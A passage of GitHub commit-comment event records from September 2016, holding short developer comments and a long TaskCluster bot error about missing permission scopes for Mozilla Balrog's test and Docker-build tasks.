{"id":"4583391579","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19078804,"position":null,"line":null,"path":null,"commit_id":"f3f5f1151ec990bfb4eff312f7a206a722dca003","created_at":"2016-09-19T13:48:24Z","updated_at":"2016-09-19T13:48:24Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;r4fqL73D&#x2F;43-implement-non-logged-in-user-group-feature\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Implement Non-logged-in user group feature</a>"}},"created_at":"2016-09-19T13:48:24Z"}
{"id":"4583393268","type":"CommitCommentEvent","actor":{"login":"cc02030"},"repo":{"name":"cc02030/com"},"payload":{"comment":{"id":19078806,"position":1,"line":1,"path":"README.md","commit_id":"6c4315d78432fa3568a617f9e5d046fc0b12e9d5","created_at":"2016-09-19T13:48:40Z","updated_at":"2016-09-19T13:48:40Z","body":"cc02030 doesn’t have any public repositories yet."}},"created_at":"2016-09-19T13:48:40Z"}
{"id":"4583393673","type":"CommitCommentEvent","actor":{"login":"kxepal"},"repo":{"name":"apache/incubator-airflow"},"payload":{"comment":{"id":19078809,"position":null,"line":null,"path":null,"commit_id":"4905a5563d47b45e38b91661ee5aa7f3765a129b","created_at":"2016-09-19T13:48:44Z","updated_at":"2016-09-19T13:48:44Z","body":"@bolkedebruin  Why commit message body wrapped with 50 characters per line while [recommendations says](https://github.com/apache/incubator-airflow/blob/master/.github/PULL_REQUEST_TEMPLATE.md): `Wrap the body at 72 characters`?"}},"created_at":"2016-09-19T13:48:44Z"}
{"id":"4583394408","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19078812,"position":null,"line":null,"path":null,"commit_id":"324659d510a1e1a684aeb2330ac8dd4cd7192aab","created_at":"2016-09-19T13:48:52Z","updated_at":"2016-09-19T13:48:52Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;iUnopFPv&#x2F;41-quotes-in-forum-post-titles-not-handled-properly-on-replies\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Quotes in Forum post titles not handled properly on replies</a>"}},"created_at":"2016-09-19T13:48:52Z"}
{"id":"4583395251","type":"CommitCommentEvent","actor":{"login":"thekeenant"},"repo":{"name":"Avicus/Rotations"},"payload":{"comment":{"id":19078813,"position":null,"line":null,"path":null,"commit_id":"f3e327a55afd4522d03c16adc6bf73c3e2de9c75","created_at":"2016-09-19T13:49:01Z","updated_at":"2016-09-19T13:49:01Z","body":"I don't think it's possible, a new module is needed."}},"created_at":"2016-09-19T13:49:01Z"}
{"id":"4583396942","type":"CommitCommentEvent","actor":{"login":"bcb"},"repo":{"name":"bcb/jsonrpcclient"},"payload":{"comment":{"id":19078819,"position":null,"line":null,"path":null,"commit_id":"6196d5fa5f10cfbfcf093021e74742c80d9d171e","created_at":"2016-09-19T13:49:21Z","updated_at":"2016-09-19T13:49:21Z","body":"Thanks for the tip re: deprecation in semver. Should've looked it up. Too late for this change but I'll remember to make it a minor release next time."}},"created_at":"2016-09-19T13:49:21Z"}
{"id":"4583400129","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19078831,"position":null,"line":null,"path":null,"commit_id":"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5","created_at":"2016-09-19T13:49:52Z","updated_at":"2016-09-19T13:49:52Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"APCpR4IOQ-2cjMcZr8bhog\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"image\\\": \\\"rail/python-test-runner\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && bash run-tests.sh backend\\\"\\n    ],\\n    \\\"features\\\": {\\n      \\\"dind\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog back-end tests\\\",\\n    \\\"description\\\": \\\"Balrog Python tests\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.200Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.200Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.200Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.425Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"APCpR4IOQ-2cjMcZr8bhog\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"image\\\": \\\"rail/python-test-runner\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && bash run-tests.sh backend\\\"\\n    ],\\n    \\\"features\\\": {\\n      \\\"dind\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog back-end tests\\\",\\n    \\\"description\\\": \\\"Balrog Python tests\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.200Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.200Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.200Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.425Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"APCpR4IOQ-2cjMcZr8bhog\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.irc-channel.#balrog.on-failed\",\n                        \"notify.irc-channel.#balrog.on-exception\"\n                    ],\n                    \"payload\": {\n                        \"maxRunTime\": 1200,\n                        \"image\": \"rail/python-test-runner\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && bash run-tests.sh backend\"\n                        ],\n                        \"features\": {\n                            \"dind\": true\n                        },\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla/balrog.git\",\n                            \"GITHUB_HEAD_USER\": \"mozbhearsum\",\n                            \"GITHUB_HEAD_SHA\": \"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozbhearsum@noreply.github.com\"\n                        }\n                    },\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ]\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Balrog back-end tests\",\n                        \"description\": \"Balrog Python tests\",\n                        \"owner\": \"mozbhearsum@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla/balrog.git\"\n                    },\n                    \"created\": \"2016-09-19T13:49:51.200Z\",\n                    \"deadline\": \"2016-09-20T13:49:51.200Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"RXoe9IZvRTmi7y9oxuNWGg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-20T13:49:51.200Z\"\n                },\n                \"time\": \"2016-09-19T13:49:51.425Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.irc-channel.#balrog.on-failed\",\n                        \"queue:route:notify.irc-channel.#balrog.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla/balrog:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U__bjpOdR3a1V9EFC2rZaA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"taskcluster/image_builder:0.1.3\\\",\\n    \\\"features\\\": {\\n      \\\"dind\\\": true,\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog/agent && git checkout $GITHUB_HEAD_BRANCH && scripts/push-dockerimage.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog Docker Image Creation\\\",\\n    \\\"description\\\": \\\"Balrog Docker Image Creation\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.201Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.201Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.201Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.400Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U__bjpOdR3a1V9EFC2rZaA\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"taskcluster/image_builder:0.1.3\\\",\\n    \\\"features\\\": {\\n      \\\"dind\\\": true,\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog/agent && git checkout $GITHUB_HEAD_BRANCH && scripts/push-dockerimage.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog Docker Image Creation\\\",\\n    \\\"description\\\": \\\"Balrog Docker Image Creation\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.201Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.201Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.201Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.400Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"U__bjpOdR3a1V9EFC2rZaA\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.irc-channel.#balrog.on-failed\",\n                        \"notify.irc-channel.#balrog.on-exception\"\n                    ],\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\"\n                    ],\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"image\": \"taskcluster/image_builder:0.1.3\",\n                        \"features\": {\n                            \"dind\": true,\n                            \"taskclusterProxy\": true\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"git clone $GITHUB_HEAD_REPO_URL && cd balrog/agent && git checkout $GITHUB_HEAD_BRANCH && scripts/push-dockerimage.sh\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla/balrog.git\",\n                            \"GITHUB_HEAD_USER\": \"mozbhearsum\",\n                            \"GITHUB_HEAD_SHA\": \"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozbhearsum@noreply.github.com\"\n                        }\n                    },\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Balrog Docker Image Creation\",\n                        \"description\": \"Balrog Docker Image Creation\",\n                        \"owner\": \"mozbhearsum@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla/balrog.git\"\n                    },\n                    \"created\": \"2016-09-19T13:49:51.201Z\",\n                    \"deadline\": \"2016-09-20T13:49:51.201Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"RXoe9IZvRTmi7y9oxuNWGg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-20T13:49:51.201Z\"\n                },\n                \"time\": \"2016-09-19T13:49:51.400Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\",\n                        \"queue:route:notify.irc-channel.#balrog.on-failed\",\n                        \"queue:route:notify.irc-channel.#balrog.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla/balrog:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  